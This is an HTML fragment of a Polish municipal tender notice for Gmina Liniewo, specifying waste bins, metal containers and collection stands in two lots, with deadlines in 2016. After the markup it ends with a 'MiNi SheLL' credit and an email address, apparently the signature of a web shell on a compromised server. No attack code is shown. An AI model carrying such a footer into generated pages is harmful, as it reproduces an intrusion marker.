              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br /><br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br /><br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br /><br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br /></div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej? <i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> :
              </b>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br /><br /><b>
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              </b><br /><b>Informacje dotyczące przebiegu aukcji elektronicznej: </b><br /><b>Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): </b><br /><b>Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: </b><br /><b>Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: </b><br /><b>Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: </b><div style="padding-left: 20px"><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>95.2</td></tr><tr><td>Gwarancja</td><td>4.8</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp (przetarg nieograniczony)</b><br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne (jeżeli dotyczy)</b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br /><b> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna</b><br /><div style="padding-left: 20px"></div><b> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej</b><br /><div style="padding-left: 20px"></div><b>Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych</b><br /><div style="padding-left: 20px"></div><b> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień</b><br /><div style="padding-left: 20px"></div><b> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: </b><div style="padding-left: 20px"><br /><b>Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:</b></div><b> Termin otwarcia licytacji elektronicznej</b><br /><div style="padding-left: 20px"></div><b> Termin i warunki zamknięcia licytacji elektronicznej</b><br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy
              <br /><div style="padding-left: 20px"></div><br /><b> Wymagania dotyczące zabezpieczenia należytego wykonania umowy</b><br /><div style="padding-left: 20px"></div><br /><b>Informacje dodatkowe:</b><br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.	Zgodnie z treścią art. 144 ust.1 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość dokonania zmian w umowie zawartej z Wykonawcą.
2.	Zmiany w umowie, na skutek wystąpienia poniższych okoliczności mogą dotyczyć następujących elementów umowy:
a)	termin wykonania zamówienia:
	wystąpienie różnego rodzaju klęsk żywiołowych, epidemii, operacji wojennych, strajku generalnego,
	ustalenie innych warunków płatności,

b)	terminy płatności i wysokość wynagrodzenia:
	zmiany w obowiązujących przepisach, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego,
	wystąpienie różnego rodzaju klęsk żywiołowych, epidemii, operacji wojennych, strajku generalnego,
	zakup dodatkowych pojemników w przypadku zwiększenia liczby nieruchomości  do objęcia zbiórką odpadów komunalnych
c)	parametry przedmiotu zamówienia:
	zmiany w obowiązujących przepisach, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego,
	zmiana ilości pojemników.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br />
              Środki służące ochronie informacji o charakterze poufnym
              <br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b>18/08/2016 godzina: 09:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br /><b>Język lub języki, w jakich  muszą być sporządzone wnioski o dopuszczenie do udziału w postępowaniu lub oferty</b>Język Polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b> I
                  
                <b>Nazwa: </b>Część I<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
                  </b>Dostawa na do Zamawiającego na teren Gminy Liniewo następującego asortymentu:
1. pojemniki na odpady biodegradowalne i popiół o pojemności 240 l  1005 szt. (pojemnik 2 kołowy wraz z pokrywą z tworzywa ), pojemnik wykonany z PE HD w kolorze brązowym 
2. pojemniki na odpady zmieszane o pojemności 240 l  1005 szt. (pojemnik 2 kołowy wraz z pokrywą z tworzywa ), pojemnik wykonany z PE HD w kolorze czarnym/grafitowym
3. pojemnik  o pojemności 1,1 m3  111 szt. (pojemnik 4 kołowy wraz z pokrywą z tworzywa- pojemniki do zbierania odpadów w tzw. gniazdach składających się z odpadów zmieszanych, szkła, papieru, tworzyw sztucznych, odpady biodegradowalne)
W tym: 
- odpady zmieszane- pojemnik wykonany z PE HD w kolorze czarnym/grafitowym oznaczony napisem ZMIESZNE z pokrywą pełną- 21 sztuk, 
- szkło- pojemnik wykonany z PE HD w kolorze zielonym oznaczonym napisem SZKŁO z pokrywą z otworami wsadowymi do wrzucania butelek- 22 sztuki,
- papier i tektura - pojemnik wykonany z PE HD w kolorze niebieskim oznaczonym napisem PAPIER z pokrywą z otworami wsadowymi do wrzucania papieru i tektury- 22 sztuki,
- metale i tworzywa sztuczne - pojemnik wykonany z PE HD w kolorze żółtym z oznaczonym napisem TWORZYWA SZTUCZNE z pokrywą z otworami wsadowymi do wrzucania tworzyw sztucznych- 24 sztuki,
- odpady biodegradowalne - pojemnik wykonany z PE HD w kolorze brązowym z oznaczonym napisem BIO/POPIÓŁ oraz NIE WRZUCAĆ GORĄCEGO POPIOŁU z pokrywa pełną- 22 sztuki,
Dodatkowo Wykonawca dostarczy Zamawiającemu naklejki wielobarwne do oklejenia pojemników z oznaczeniem rodzaju odpadów jakie można wrzucać do pojemnika. Minimalne wymiary naklejki dla pojemników 240 ltr. - 15cm x 25 cm, dla pojemników o pojemności 1100 ltr. -  25 cm x 35 cm. Zamawiający dostarczy wzór naklejki w terminie do 30 dni od dnia podpisania umowy.

Wymagane parametry pojemników 240 ltr. 

Pojemniki musza być sprawne, bez wad i uszkodzeń, odporne na udary mechaniczne, niskie temperatury, działanie promieni UV oraz erozję chemiczną, 
Pojemniki 240 ltr. musza być wyposażone w mechanizm jezdny  dwukołowy system jezdny (koła gumowane o średnicy 200 mm osadzone na zamkniętej osi stalowej), 
Zamykane pokrywą z góry z uchwytem do otwierania, 
Wyposażone w uchwyty transportowe i załadunkowe, 
Przystosowane do opróżniania przez samochody śmieciarki posiadające listwę grzebieniową; 
bezpieczeństwo produktu  skład chemiczny tworzywa i pigmentów nie ma negatywnego wpływu na zdrowie użytkowników  pojemniki posiadają atest Państwowego Zakładu Higieny  dołączyć atest, 
Wykonane zgodnie z normą EN 840,
Wykonane zgodnie z normą RAL GZ 951/1 lub równoważną  dołączyć certyfikat
Pojemniki mają być kompletne i spełniać funkcję do jakich są przeznaczone. 

Wymagane parametry pojemników 1100 ltr. 

Pojemniki musza być sprawne, bez wad i uszkodzeń, odporne na udary mechaniczne, niskie temperatury, działanie promieni UV oraz erozję chemiczną,
Pojemniki 240 ltr. musza być wyposażone w mechanizm jezdny  czterokołowy system jezdny (koła gumowane o średnicy 200 mm, w tym co najmniej dwa koła blokowane),
Zamykane pokrywą z otworami lub bez zgodnie z wymaganiami określonymi w punkcie 3 z góry z uchwytem do otwierania, 
Wyposażone w uchwyty transportowe i załadunkowe, 
Przystosowane do opróżniania przez samochody śmieciarki posiadające listwę grzebieniową; 
Bezpieczeństwo produktu  skład chemiczny tworzywa i pigmentów nie ma negatywnego wpływu na zdrowie użytkowników  pojemniki posiadają atest Państwowego Zakładu Higieny  dołączyć atest, 
Wykonane zgodnie z normą EN 840, 
Wykonane zgodnie z normą RAL GZ 951/1 lub równoważną  dołączyć certyfikat
Pojemniki mają być kompletne i spełniać funkcję do jakich są przeznaczone. 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>34928480-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 18/11/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>95.2</td></tr><tr><td>Gwarancja </td><td>4.8</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>II
                  
                <b>Nazwa: </b>Część II<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
                  </b>Przedmiotem zamówienia jest dostawa do punktu selektywnej zbiórki odpadów komunalnych w Orlu, Orle 36 fabrycznie nowych, metalowych kontenerów wannowych typu mulda o pojemności:
a) Kontenery -min. 5 m3 - 3 szt. 
Kontenery, które należy dostarczyć mają być:
Wykonane według obowiązujących norm DIN 30722/DIN 30720-1 lub równoważnych;
Dostosowane do bramowego systemu załadunku/wyładunku;
Wykonane w wersji asymetrycznej otwartej;
Wyposażone w minimum cztery zaczepy boczne o średnicy minimalnej 45 mm do bramowego systemu załadunku;
Wyposażone w minimum dwa zaczepy pod dolny hak do wywrotu;
Wyposażone w haczyki do mocowania siatki zabezpieczającej/plandeki po obwodzie kontenera;
Wykonane z blachy czarnej lakierowanej lub ocynkowanej ogniowo;
Wykonane jako szczelne spawem ciągłym;
Wykonane z blachy o grubości: min. 5 mm (dno) i min. 3 mm (ściany);
O wymiarach głównych: długość maksymalna 3550 mm, szerokość maksymalna 1870 mm, wysokość maksymalna 1250 mm;
Zabezpieczone antykorozyjnie farbą podkładową i nawierzchniową w kolorze niebieskim nanoszoną metodą hydrodynamiczną;
Dodatkowo zabezpieczone wewnątrz środkiem antykorozyjnym;
Trwale dwustronnie oznakowane poprzez wspawanie na bokach kontenera blach z wyciętym napisem: GMINA LINIEWO. 
Do kontenerów należy dołączyć dokumentację techniczną zawierającą:
- deklarację zgodności;
- kartę katalogową z rysunkiem technicznym;
b) Kontenery - min. 7 m3 - 2 szt. 
Kontenery, które należy dostarczyć mają być:
Wykonane według obowiązujących norm DIN 30722/DIN 30720-1 lub równoważnych;
Dostosowane do bramowego systemu załadunku/wyładunku;
Wykonane w wersji asymetrycznej otwartej;
Wyposażone w minimum cztery zaczepy boczne o średnicy minimalnej 45 mm do bramowego systemu załadunku;
Wyposażone w minimum dwa zaczepy pod dolny hak do wywrotu;
Wyposażone w haczyki do mocowania siatki zabezpieczającej/plandeki po obwodzie kontenera;
Wykonane z blachy czarnej lakierowanej lub ocynkowanej ogniowo;
Wykonane jako szczelne spawem ciągłym;
Wykonane z blachy o grubości: min. 5 mm (dno) i min. 3 mm (ściany);
O wymiarach głównych: długość maksymalna 3550 mm, szerokość maksymalna 1870 mm, wysokość maksymalna 1500 mm;
Zabezpieczone antykorozyjnie farbą podkładową i nawierzchniową w kolorze niebieskim nanoszoną metodą hydrodynamiczną;
Dodatkowo zabezpieczone wewnątrz środkiem antykorozyjnym;
Trwale dwustronnie oznakowane poprzez wspawanie na bokach kontenera blach z wyciętym napisem: GMINA LINIEWO. 
Do kontenerów należy dołączyć dokumentację techniczną zawierającą:
- deklarację zgodności;
- kartę katalogową z rysunkiem technicznym.

c) Pojemnik na  zużyte akumulatory o pojemności min. 500 litrów tzn. skrzyniopaleta w ilości 1 sztuki o następujących parametrach:
Wykonana z polietylenu;
Wyposażona w gładkie dno i ścianki oraz zdejmowalną pokrywę;
O wytrzymałej konstrukcji umożliwiającej warstwowe składowanie;
Opierająca się na dwóch płozach;
Dostosowana do wózków widłowych;
O wytrzymałości cieplnej: -40*C - +60*C;
Odporna na działanie czynników chemicznych, zmienne warunki atmosferyczne oraz promieniowanie UV;
O nośności min. 500 kg;
Wykonana w kolorze szarym. 

d) Pojemnik na baterie o pojemności min. 150 litrów w ilości 1 sztuki o następujących parametrach:
- do stosowania wewnątrz i na zewnątrz budynków;
- wykonany z polietylenu; 
- odporny na działanie czynników chemicznych, zmienne warunki atmosferyczne oraz promieniowanie UV;
- wyposażony w zdejmowalną pokrywę z otworem wrzutowym o średnicy 12 - 15 cm zabezpieczonym np. fartuchem gumowym przed przedostawaniem się opadów i nieczystości z zewnątrz do wnętrza pojemnika;
- wykonany w kolorze pomarańczowym lub czerwonym.

e) Pojemnik na przeterminowane leki o pojemności min. 50 litrów w ilości 1 sztuka o następujących parametrach:
Do stosowania wewnątrz i na zewnątrz budynków;
Wykonany ze stalowej blachy ocynkowanej malowanej proszkowo;
Odporny na działanie czynników chemicznych, korozję, zmienne warunki atmosferyczne oraz promieniowanie UV;
Wyposażony w wewnętrzne wyjmowane wiadro wykonane z blachy ocynkowanej;
Wyposażony w zamek zamykany na klucz zabezpieczający przed dostępem osób postronnych;
Opróżnianie poprzez zwolnienie zamka;
Wyposażony w otwór lub dwa otwory wrzutowe o średnicy 12 - 15 cm zabezpieczony/e np. fartuchem gumowym przed przedostawaniem się opadów i nieczystości z zewnątrz do wnętrza pojemnika;
Wykonany w kolorze białym.

f) Pojemnik na chemikalia o pojemności min. 200 litrów w ilości 2 sztuki o następujących parametrach:
Do stosowania na zewnątrz budynków;
O wzmocnionej konstrukcji odpornej na uszkodzenia mechaniczne, zmienne warunki atmosferyczne, czynniki chemiczne oraz promieniowanie UV;
Wykonane z wysokiej jakości polietylenu (PE) dwu płaczowy wraz z pokrywą;
Przeznaczone do przechowywania substancji z grupy II i III (m.in. chemikalia, pojemniki po farbach itp.);
Wyposażone w szczelną pokrywę z uszczelką oraz dwiema metalowymi zapinkami uszczelniającymi zabezpieczającymi przed samoistnym otwarciem pokrywy;
Wyposażone w dwa kółka z tworzywa ułatwiające przemieszczanie;
Przystosowane do transportu wózkiem widłowym;
Przystosowane do magazynowania warstwowego;
Wykonane w kolorze niebieskim i czerwoną pokrywą.
g) Stelaż- 1005 kpl.  (metalowy fabrycznie nowy stelaż wraz z pokrywą z tworzywa sztucznego do zabezpieczania worków do  selektywnej zbiórki) 
Stojak potrójny rozstawiany, 
Stojak przystosowany do worków 120 l,
Wygodne i pewne mocowanie worka na obręczy za pomocą obejmy napinanej sprężyną,
Metalowa lub z tworzywa sztucznego pokrywa o średnicy 35 cm,
Konstrukcja metalowa,
Lakierowany proszkowo.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>34928480-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 18/11/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>95.2</td></tr><tr><td>Gwarancja </td><td>4.8</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com